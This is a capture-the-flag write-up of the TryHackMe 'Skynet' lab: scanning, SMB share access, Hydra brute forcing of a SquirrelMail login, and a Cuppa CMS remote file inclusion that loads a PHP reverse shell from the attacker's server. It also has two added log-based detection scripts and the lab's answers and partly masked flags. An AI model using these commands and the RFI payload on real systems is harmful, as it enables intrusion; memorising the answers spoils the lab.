Complete TryHackMe SkyNet WriteUp

TryHackMe Skynet is a vulnerable Terminator-themed Linux machine created to test our penetration testing knowledge in network scanning, enumeration, attacking Samba shares, RFI attacks and privilege escalation.


Start the Machine

Before anything else, we need to start the machine and wait around a minute before beginning the recon phase. Once the machine is up and running, it’s time to scan the box.

Scan the Target Machine

To scan our machine I will use Nmap with a few arguments to detect the service versions on all ports.

nmap -sV -sC -A -p- 10.10.131.16

Analyse Nmap Scan results

After running the Nmap scan I noticed a few open ports and four main services: SSH, Apache, Dovecot and Samba.

[Screenshot: Nmap scan of Skynet]
  • 22/tcp SSH
  • 80/tcp HTTP
  • 110/tcp POP3
  • 139/tcp NetBIOS Samba
  • 143/tcp IMAP
  • 445/tcp NetBIOS Samba

Investigate Port 80 Apache/2.4.18

Open your browser and go to your Skynet box IP; a dummy Skynet search engine appears.

[Screenshot: port 80 dummy search engine]

I tried searching for something, but nothing happened. Analyzing the HTML code, I couldn’t find anything relevant!

[Screenshot: HTML code]

At this point we have nothing from the web server, so it’s time to search for folders and find something useful to explore.

Execute gobuster

To find new folders on the webserver I will use gobuster with a public list.

gobuster dir -u http://10.10.131.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50

After running gobuster we got some useful folders to investigate, but only one can be opened: the squirrelmail folder!

Info to Explore

  • folder squirrelmail

Investigate Dovecot

Open the browser and access the squirrelmail folder. It opens a login page and shows us the SquirrelMail version, 1.4.23.

http://10.10.131.16/squirrelmail
[Screenshot: TryHackMe Skynet SquirrelMail login page]

At this point we have the version of the SquirrelMail service and a login page, but no clue about any username or email. I tried some basic SQLi, but without success. It’s time to try the next available service, Samba.

Investigate Samba

To investigate the Samba service I usually use the SMBMap tool or Nmap.

smbmap -H 10.10.131.16
[Screenshot: SMBMap output for Skynet]

After executing smbmap we got some juicy info: we can read the anonymous share, and there is an interesting share named milesdyson, but we don’t have access to it.

Wait, milesdyson sounds like a username to me; maybe it can be used on the SquirrelMail login page. Keep it in mind. For now I will investigate the anonymous share, where I may find a useful file.

Connect to anonymous Share

For now let’s connect to the anonymous share with SMBClient using the command:

smbclient //10.10.131.16/anonymous

We are in; let’s list the available files and search…

[Screenshot: anonymous share output]

We have one file and one folder to investigate.

cat attention.txt
[Screenshot: attention.txt file output]

This confirms our suspicion: the user Miles Dyson exists.

[Screenshot: log1.txt output]

The log1.txt file looks like a password list and may be usable as a wordlist to brute force the SquirrelMail login page. Let’s try it.

Brute force Squirrel login with Hydra

Here we will test milesdyson as the username and the log1.txt file as the wordlist.

hydra -l milesdyson -P log1.txt 10.10.131.16 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Something is incorrect." -V -F -u
[Screenshot: brute force of the SquirrelMail login]

After a successful brute force attack against SquirrelMail we can log in with user milesdyson and password cyborg007haloterminator
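
Seen from the server side, the Hydra run above is a burst of POST requests to the SquirrelMail login handler from a single address. The sketch below is an added example, not part of the original write-up: it flags such bursts in an Apache access log, and the log lines, timestamps, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/squirrelmail/src/redirect.php"  # login handler posted to in the Hydra command
# Client IP, timestamp and request path of POST entries in Apache combined log format.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "POST (\S+) ')

def sample_line(ip, second, method="POST", path=LOGIN_PATH):
    """Build one constructed log entry `second` seconds after a fixed start time."""
    ts = (datetime(2021, 3, 12, 10, 0, 0) + timedelta(seconds=second)).strftime("%d/%b/%Y:%H:%M:%S")
    return f'{ip} - - [{ts} +0000] "{method} {path} HTTP/1.1" 200 512 "-" "-"'

# Constructed sample: one client posting once per second, one user retrying after a minute.
SAMPLE_LOG = (
    [sample_line("10.10.153.122", s) for s in range(8)]
    + [sample_line("10.10.20.5", 0), sample_line("10.10.20.5", 60)]
    + [sample_line("10.10.20.5", 61, "GET", "/squirrelmail/src/login.php")]
)

def detect_login_bursts(lines, threshold=5, window=timedelta(seconds=10)):
    """Return {ip: time of first alert} for clients with >= threshold login POSTs inside window."""
    recent = defaultdict(deque)  # per-client timestamps still inside the sliding window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group(3).split("?")[0] != LOGIN_PATH:
            continue  # not a POST to the login handler
        ip = m.group(1)
        when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = when
    return alerts

if __name__ == "__main__":
    for ip, when in detect_login_bursts(SAMPLE_LOG).items():
        print(f"login burst from {ip}, threshold reached at {when.isoformat()}")
```

All POSTs are counted rather than only failed ones, because the access log alone does not say whether a login attempt succeeded.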

[Screenshot: SquirrelMail dashboard]

Open first email and extract Samba password

[Screenshot: TryHackMe Skynet Samba password]

Connect to milesdyson Share

smbclient //10.10.131.16/milesdyson -U milesdyson

Enter the password: )s{A&2Z=F^n_E.B`
[Screenshot: reading the milesdyson Samba share]

There are only PDF files and a folder called notes. Let’s list it.


One file looks interesting: important.txt

[Screenshot: reading the important.txt file]

The important.txt file mentions a new directory, /45kra24zxs28v3yd. Open it and we have the Miles Dyson homepage.

[Screenshot: Miles Dyson personal page]

Gobuster to find the administrator page

gobuster dir -u http://10.10.131.16/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
Open http://10.10.131.16/45kra24zxs28v3yd/administrator

Cuppa CMS Exploit

Find a useful exploit to run against Cuppa CMS

searchsploit cuppa
[Screenshot: Cuppa CMS exploit]

Select Reverse Shell

Here I will copy the PHP reverse shell into my home folder and then start a Python web server to

cp /usr/share/webshells/php/php-reverse-shell.php ~

Change the web shell’s IP and port values if needed.

[Screenshot: editing the PHP reverse shell]

cd /home/user
python3 -m http.server 801
http://10.10.131.16/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.153.122:801/php-reverse-shell.php

Open a new terminal and use netcat or Metasploit to listen on port 1234

nc -l 1234
cd milesdyson
cat user.txt
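
From the defender's side, the inclusion request above leaves a distinctive access-log entry: a query parameter (here urlConfig) whose value is itself a URL. The sketch below is an added example, not part of the original write-up; it flags such parameters, including percent-encoded variants, and the log lines, timestamps and the example.test host are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Client address and request target from an Apache combined-format access log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# Schemes and PHP wrappers that should not start a value the application includes as a file.
REMOTE_RE = re.compile(r'^\s*(https?|ftps?|php|data|expect)\s*:', re.IGNORECASE)

# Constructed sample log (not captured from a real server).
SAMPLE_LOG = [
    '10.10.20.5 - - [12/Mar/2021:10:14:40 +0000] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2912 "-" "-"',
    '10.10.153.122 - - [12/Mar/2021:10:15:02 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=http://10.10.153.122:801/php-reverse-shell.php HTTP/1.1" 200 1410 "-" "-"',
    '10.10.153.122 - - [12/Mar/2021:10:15:09 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=http%3A%2F%2Fexample.test%2Fa.php HTTP/1.1" 200 1410 "-" "-"',
    '10.10.153.122 - - [12/Mar/2021:10:15:15 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/'
    'alertConfigField.php?urlConfig=%2568ttp%253A%252F%252Fexample.test%252Fx.php HTTP/1.1" 200 1410 "-" "-"',
    '10.10.20.5 - - [12/Mar/2021:10:16:00 +0000] "GET /index.php?q=what+is+http%3A HTTP/1.1" 200 512 "-" "-"',
    'not an access log line',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values (%2568ttp) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_candidates(lines):
    """Return (ip, path, param, value) for each query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # malformed line: skip instead of failing the whole run
        parts = urlsplit(m.group("target"))
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(raw)  # parse_qsl already decoded one layer
            if REMOTE_RE.match(value):
                hits.append((m.group("ip"), parts.path, name, value))
    return hits

if __name__ == "__main__":
    for ip, path, name, value in find_rfi_candidates(SAMPLE_LOG):
        print(f"{ip} {path} {name}={value}")
```

Hits are candidates for triage, since legitimate redirect parameters also carry URLs. PHP only fetches a remote URL in an include when allow_url_include is enabled (it is off by default), so keeping it off is the matching mitigation.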

Our session is limited to the user the web server runs as, www-data. We need to find a way to elevate privileges, but before that let’s brute force the Samba share milesdyson.

Brute Force Samba Service

hydra -l milesdyson -P log1.txt 10.10.131.16 smb -V

No success brute forcing the milesdyson share. OK, let’s be more intrusive.

Privilege Escalation

Using Exploit

Search for an exploit for our kernel version

searchsploit kernel 4.8.0
[Screenshot: search kernel exploit]

Using Crontab

Root Flag

cat /root/root.txt

Answer Questions

Now it’s time to answer the CTF questions.

[Screenshot: Skynet questions]

What is Miles password for his emails?

cyborg007haloterminator

What is the hidden directory?

/45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

What is the user flag?

7ce5c2109a40f958099283600a9aeXXX

What is the root flag?

3f0372db24753accc7179a282cd6aXXX

Linux Kernel 4.8.0 UDEV < 232 – Local Privilege Escalation
